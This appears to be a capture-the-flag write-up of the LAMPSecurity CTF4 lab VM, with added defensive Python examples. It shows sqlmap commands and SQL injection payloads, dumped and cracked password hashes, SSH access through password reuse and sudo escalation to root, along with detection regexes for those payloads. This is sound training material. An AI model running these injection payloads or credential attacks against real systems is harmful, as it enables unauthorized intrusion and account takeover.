Core dump overflow

Pentest lab - LAMPSecurity CTF4


Today’s target is part of a CTF series by the LAMPSecurity project.

The Nmap scan reveals just a few ports:

root@pwnbox:~/Downloads#nmap -sS -sV -p1-65535 192.168.80.152

Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2016-03-02 09:26 EST
Nmap scan report for 192.168.80.152
Host is up, received arp-response (0.00038s latency).
Not shown: 65531 filtered ports, 1 closed port
Reason: 65369 no-responses, 162 host-prohibiteds and 1 reset
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 4.3 (protocol 2.0)
25/tcp open  smtp    syn-ack ttl 64 Sendmail 8.13.5/8.13.5
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.2.0 ((Fedora))
MAC Address: 00:0C:29:1D:B6:45 (VMware)
Service Info: Host: ctf4.sas.upenn.edu; OS: Unix

Checking out the web server, we can see this page:

[screenshot: home page of the target web site]

Let’s get digging!

Recon

The Blog section contains some blog posts, for which the URL looks like this: http://192.168.80.152/index.html?page=blog&title=Blog&id=5. That id parameter calls for SQLi testing and the page parameter could be vulnerable to LFI. But for now, let’s keep sniffing around.

One of the things I always do when doing web based challenges is check if there’s anything of interest in the robots.txt file. So I did it here as well and I wasn’t disappointed:

User-agent: *
Disallow: /mail/
Disallow: /restricted/
Disallow: /conf/
Disallow: /sql/
Disallow: /admin/

Quite a few places to check! Let’s see what we’ve got.

  • /mail/

This is not your regular mail server:

[screenshot: SquirrelMail login page]

I’ve never seen this before, so I checked the project’s homepage:

SquirrelMail is a standards-based webmail package written in PHP. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. SquirrelMail has all the functionality you would want from an email client, including strong MIME support, address books, and folder manipulation.

Ok, will come back to this, for now I’m just checking the entire thing for possible entry points.

  • /restricted/

Trying to get to this folder pops up a basic authentication window. Moving on.

  • /conf/

This one gives an internal server error, but discloses the e-mail address of the server administrator: dstevens@localhost

  • /sql/

Here we have directory indexing enabled, with a db.sql file that contains the following:

use ehks;
create table user (user_id int not null auto_increment primary key, user_name varchar(20) not null, user_pass varchar(32) not null);
create table blog (blog_id int primary key not null auto_increment, blog_title varchar(255), blog_body text, blog_date datetime not null);
create table comment (comment_id int not null auto_increment primary key, comment_title varchar (50), comment_body text, comment_author varchar(50), comment_url varchar(50), comment_date datetime not null);

  • /admin/

And finally, an admin login page.

[screenshot: admin login page]

Also, the search functionality is vulnerable to XSS! Ok, we have enough information to start poking deeper.

Getting in

The first thing I tried was putting a quote in the id parameter, and a SQL error popped up: Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /var/www/html/pages/blog.php on line 20. Time to fire up sqlmap!
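The warning above is the classic symptom of a parameter pasted straight into a query string. The following is an added example (not code from the original post or from the CTF) that rebuilds a tiny stand-in for the blog table from db.sql in SQLite and shows, side by side, the concatenation bug that makes the quote probe and the boolean payload sqlmap later found work, and the parameterized form that defeats both. The table rows, the function names and the use of sqlite3 instead of MySQL are assumptions for portability.

```python
import sqlite3

# Constructed in-memory stand-in for the blog table from db.sql, with two made-up rows
# (sample data, not the CTF's content). sqlite3 replaces MySQL so this runs anywhere.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table blog (blog_id integer primary key, blog_title text, "
                 "blog_body text, blog_date text)")
    conn.executemany("insert into blog values (?, ?, ?, ?)",
                     [(1, "First post", "hello", "2016-01-01 10:00:00"),
                      (2, "Second post", "world", "2016-01-02 10:00:00")])
    return conn

def fetch_post_vulnerable(conn, blog_id):
    # The mistake behind the mysql_fetch_row() warning: the raw id parameter is
    # concatenated into the SQL text, so anything after the number is parsed as SQL.
    sql = "select blog_id, blog_title from blog where blog_id = %s" % blog_id
    return conn.execute(sql).fetchall()

def fetch_post_safe(conn, blog_id):
    # Hardened form: validate the expected type, then bind the value as a parameter so
    # the driver never interprets it as SQL. Anything that is not a plain integer is rejected.
    text = str(blog_id).strip()
    if not text.isdigit():
        return []
    return conn.execute("select blog_id, blog_title from blog where blog_id = ?",
                        (int(text),)).fetchall()

def quote_triggers_error(conn):
    # Reproduces the first probe from the write-up: a stray quote makes the concatenated
    # query syntactically invalid, which is what surfaces a database error to the user.
    try:
        fetch_post_vulnerable(conn, "2'")
    except sqlite3.OperationalError:
        return True
    return False

if __name__ == "__main__":
    db = build_db()
    print("quote -> error:", quote_triggers_error(db))
    print("vulnerable, '2 AND 4151=4151':", fetch_post_vulnerable(db, "2 AND 4151=4151"))
    print("vulnerable, '2 AND 4151=4152':", fetch_post_vulnerable(db, "2 AND 4151=4152"))
    print("safe, '2 AND 4151=4151':", fetch_post_safe(db, "2 AND 4151=4151"))
    print("safe, '2':", fetch_post_safe(db, "2"))
```

The boolean-blind technique sqlmap reports later works precisely because the vulnerable version returns the row for a true condition and nothing for a false one; the safe version returns nothing for either, since the whole string fails the integer check before it ever reaches the database.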

First, I enumerated the available databases:

sqlmap -u "http://192.168.80.152/index.html?page=blog&title=Blog&id=2" -p "id" --dbms=MySQL --dbs

[06:05:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=blog&title=Blog&id=2 AND 4151=4151

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: page=blog&title=Blog&id=2 AND (SELECT * FROM (SELECT(SLEEP(5)))tueL)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: page=blog&title=Blog&id=2 UNION ALL SELECT NULL,NULL,CONCAT(0x716a7a7671,0x61536d554d5745557253,0x7162716a71),NULL,NULL-- 
---
[06:05:45] [INFO] testing MySQL
[06:05:45] [INFO] confirming MySQL
[06:05:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 5 (Bordeaux)
web application technology: Apache 2.2.0, PHP 5.1.2
back-end DBMS: MySQL >= 5.0.0
[06:05:45] [INFO] fetching database names
available databases [6]:
[*] calendar
[*] ehks
[*] information_schema
[*] mysql
[*] roundcubemail
[*] test
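The three payload shapes sqlmap reports (boolean comparison, SLEEP()-based delay, UNION ... SELECT) are exactly what a web-server log review or a HIDS rule should pick up; the OSSEC alerts found in the mailbox later in the write-up are the server-side view of the same traffic. As an added example (not from the original post or from the CTF), the block below URL-decodes the request path from constructed Apache access-log lines carrying those payload shapes and tags each with the technique it matches. The log lines, client addresses and signature names are constructed for the demo.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-log style lines (not from the target). The first three carry
# the same payload shapes sqlmap reported, URL-encoded as a browser or tool would send them;
# the last is a normal request for comparison.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Mar/2016:09:30:01 -0500] "GET /index.html?page=blog&title=Blog&id=2%20AND%204151%3D4151 HTTP/1.1" 200 4211
10.0.0.5 - - [02/Mar/2016:09:30:02 -0500] "GET /index.html?page=blog&title=Blog&id=2%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29tueL%29 HTTP/1.1" 200 4211
10.0.0.5 - - [02/Mar/2016:09:30:03 -0500] "GET /index.html?page=blog&title=Blog&id=2%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x716a7a7671%29%2CNULL%2CNULL--%20 HTTP/1.1" 200 4211
10.0.0.7 - - [02/Mar/2016:09:31:10 -0500] "GET /index.html?page=blog&title=Blog&id=5 HTTP/1.1" 200 4211
"""

# Minimal access-log parser: client address, timestamp, method, request path, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d+)')

# One signature per technique seen in the sqlmap output. They are matched against the
# decoded path so percent-encoding does not hide the keywords.
SIGNATURES = [
    ("boolean-blind", re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I)),
    ("time-blind",    re.compile(r"\bSLEEP\s*\(|\bBENCHMARK\s*\(", re.I)),
    ("union",         re.compile(r"\bUNION\b.*\bSELECT\b", re.I)),
]

def classify(path):
    """Return the list of technique names whose signature matches the decoded path."""
    decoded = unquote_plus(path)
    return [name for name, rx in SIGNATURES if rx.search(decoded)]

def scan(log_text):
    """Return (client_ip, [techniques]) for every log line that matches a signature."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        tags = classify(m["path"])
        if tags:
            findings.append((m["ip"], tags))
    return findings

if __name__ == "__main__":
    for ip, tags in scan(SAMPLE_LOG):
        print(ip, ", ".join(tags))
```

Decoding before matching matters: the raw line for the time-based payload contains no literal "SLEEP(" at all, only "SLEEP%28", so a signature applied to the undecoded path would miss it. In practice the per-client counts from scan() are what you alert on, since a single hit can be a false positive while a burst from one address with all three techniques is not.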

I then looked at the ehks database; the interesting table contains usernames and password hashes:

Database: ehks
Table: user
[6 entries]
+---------+-----------+----------------------------------+
| user_id | user_name | user_pass                        |
+---------+-----------+----------------------------------+
| 1       | dstevens  | 02e823a15a392b5aa4ff4ccb9060fa68 |
| 2       | achen     | b46265f1e7faa3beab09db5c28739380 |
| 3       | pmoore    | 8f4743c04ed8e5f39166a81f26319bb5 |
| 4       | jdurbin   | 7c7bc9f465d86b8164686ebb5151a717 |
| 5       | sorzek    | 64d1f88b9b276aece4b0edcc25b7a434 |
| 6       | ghighland | 9f3eb3087298ff21843cc4e013cf355f |
+---------+-----------+----------------------------------+

I cracked the MD5 hashes with an online tool, behold the passwords!

dstevens: ilike2surf
achen: seventysixers
pmoore: Homesite
jdurbin: Sue1978
sorzek: pacman
ghighland: undone1
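The user table stores unsalted MD5, which is why an online lookup recovers every password in seconds: identical passwords produce identical hashes, so one precomputed table serves every site that uses the scheme. The block below is an added example (not from the original post) that shows the effect on a constructed user table in the same shape as ehks.user, and beside it the storage that should have been used: a per-user random salt and a slow derivation (PBKDF2-HMAC-SHA256 here) verified in constant time. The user names, passwords, word list and the format of the stored string are assumptions for the demo.

```python
import hashlib
import hmac
import os

# Constructed demo table in the shape of ehks.user (user_name -> user_pass), hashed with
# unsalted MD5 as the CTF did. Passwords are made up; note that alice and bob share a hash.
DEMO_USERS = {
    "alice": hashlib.md5(b"password").hexdigest(),
    "bob":   hashlib.md5(b"password").hexdigest(),
    "carol": hashlib.md5(b"letmein").hexdigest(),
}

# A tiny constructed word list standing in for the dictionary behind an online lookup service.
WORDLIST = ["123456", "password", "letmein", "qwerty"]

def lookup_md5(table, wordlist):
    """Unsalted MD5 needs only a precomputed hash -> word map; each hit is a direct lookup."""
    precomputed = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: precomputed[h] for user, h in table.items() if h in precomputed}

def hash_password(password, salt=None, iterations=200_000):
    """Salted, iterated storage: a fresh 16-byte salt per user and a deliberately slow KDF.
    Stored string format (assumed for this example): algo$iterations$salt_hex$hash_hex."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def verify_password(password, stored):
    """Re-derive with the stored salt and iteration count; compare without timing leaks."""
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    print("recovered from unsalted MD5:", lookup_md5(DEMO_USERS, WORDLIST))
    stored = hash_password("password")
    print("salted record:", stored)
    print("same password, second record differs:", hash_password("password") != stored)
    print("verify correct:", verify_password("password", stored),
          "verify wrong:", verify_password("Password", stored))
```

With salted records the precomputed-table shortcut disappears (every user needs a separate guessing run) and the iteration count makes each guess cost on the order of a hundred thousand hash operations instead of one. Newer libraries offer bcrypt, scrypt or Argon2 for the same purpose; PBKDF2 is used here only because it ships with the Python standard library.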

With dstevens’ credentials I was able to log in to both the mail and the admin panel. The admin functionality allows you to create another blog page, which I tested and it works. The mailbox was more interesting, because it was filled with OSSEC HIDS logs of my attacks! I will delete them before I’m done, but for now I scrolled all the way to the bottom to find some real mail:

I'm installing OSSEC v2 on the server - so I also had to install gcc and
binutils.  Just wanted to let you know.

-- 
Andrew Chen
Unix Administrator
Ehks Data Research Center

I’m thinking this mail is not just there to occupy storage, but is hinting that we’ll have to do some binary exploitation on the target... Anyway, there is more mail about the server setup:

Hello all,

  the server is up and running now and should be able to support most of
our needs.  Don and I are still working on installing a few more patches
and configuring things.  Let us know if you have any problems.  Thanks!

-- 
Don Stevens
Sr. Unix Admin
Prof. Ehks Data Research Center
Hey Don,

  I think I got the server pretty much set up.  I just have to make some
more adjustments.  Unfortunately I couldn't get RoundCube installed
because our version of PHP is too low.  I'll send more updates as I make
them.

-- 
James Durbin
Webmaster
Prof. Ehks Data Research Center

There is also mail about a calendar feature that I wasn’t aware of:

Hello all,

  I'd like to announce that the new calendaring software is online.  You
all have accounts that you can log in with, they have the same username
and password as your machine accounts.  Feel free to log into the new
system at http://192.168.0.6/calendar.  Let me know if you have any
problems.

-- 
Don Stevens

I had almost forgotten to check the /restricted folder, so I did that next. It worked with the pmoore/Homesite pair. Inside there are 2 text files:

blog_instructions.txt

Instructions for Posting to the Blog
====================================

Just log into the admin section at http://192.168.0.6/admin.
Use your regular machine credentials (username and password).
Once you're logged in click the "Blog" link.

webmail_instructions.txt  

Instructions for Webmail
========================

Browse to the URL http://192.168.0.6/mail
Log in with your regular machine credentials (username and password).
Use webmail ;)

Let Don or James know if you're having problems.

Just stuff we had already figured out on our own. Because of the hint in the mail, I checked the PHP version: the headers report it as 5.1.2. Next I logged in to the calendar:

[screenshot: calendar application after login]

In the admin tab we can modify some calendar options and add a new user. Nothing too helpful in hacking the target, although I did try an RFI because a Nessus scan I had run indicated the calendar was vulnerable to arbitrary file inclusion. So the last thing left to try before thinking of more options was to see if I could log in to SSH with any of the usernames and passwords I had. And I was able to get into the box on the first try, as dstevens!

I looked around in his home directory; the files related to the site are hosted there. Then I tried to read the /etc/sudoers file, and it worked with sudo and his password:

...
# User privilege specification
root  ALL=(ALL) ALL
dstevens  ALL=(ALL)   ALL
achen ALL=(ALL)   NOPASSWD:ALL
...
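Two things stand out in that excerpt: a regular user with the same rule as root, and another user who does not even need a password for it. Both are easy to find mechanically, which is the kind of check a hardening review or a configuration-audit job should run. The block below is an added example (not from the original post) that parses user specification lines in sudoers syntax and flags unrestricted rules for non-root users, rating NOPASSWD:ALL above a password-protected ALL. The excerpt it runs on is constructed to mirror the lines shown above, with an extra Defaults line and a scoped rule added as negative cases; the severity labels are an assumption.

```python
import re

# Constructed sudoers excerpt mirroring the lines from the write-up, plus a Defaults line
# and a command-scoped rule (pmoore) that should not be flagged.
SUDOERS = """\
Defaults    requiretty
# User privilege specification
root  ALL=(ALL) ALL
dstevens  ALL=(ALL)   ALL
achen ALL=(ALL)   NOPASSWD:ALL
pmoore ALL=(ALL) /usr/bin/less
"""

# User specification: who  hosts=(runas) [TAG:]commands
RULE_RE = re.compile(r"^(?P<who>\S+)\s+(?P<hosts>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")

def audit_sudoers(text):
    """Return (user, severity) for every non-root user allowed to run ALL commands.
    'critical' when the rule also carries NOPASSWD, 'high' when a password is still required."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m or m["who"] == "root":
            continue
        # Tags such as NOPASSWD are prefixed to the command list with a colon.
        parts = [p.strip() for p in m["cmds"].split(":")]
        tags, command = parts[:-1], parts[-1]
        if command == "ALL":
            severity = "critical" if "NOPASSWD" in tags else "high"
            findings.append((m["who"], severity))
    return findings

if __name__ == "__main__":
    for user, severity in audit_sudoers(SUDOERS):
        print(f"{severity:8s} {user}: unrestricted sudo")
```

The check deliberately treats a password-protected ALL as a finding too: with password reuse across web, mail and shell accounts, as on this target, the password prompt adds nothing once one credential has leaked. Real sudoers files also pull in /etc/sudoers.d and use aliases, so a production version of this audit would expand those before matching.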

Well, look at these privileges! Then it’s all a matter of becoming root with a simple su:

[dstevens@ctf4 calendar]$ sudo su -
Password:
[root@ctf4 ~]# whoami
root

Game over! Although at the beginning there seemed to be multiple web avenues for exploitation, most of them were informational, and it was just the SQL injection that gave the keys to the kingdom. Lax permissions and password reuse facilitated the compromise of the target.

/ Q: How do you shoot a blue elephant? A: \
| With a blue-elephant gun.               |
|                                         |
| Q: How do you shoot a pink elephant? A: |
| Twist its trunk until it turns blue,    |
| then shoot it with                      |
|                                         |
\ a blue-elephant gun.                    /
 -----------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
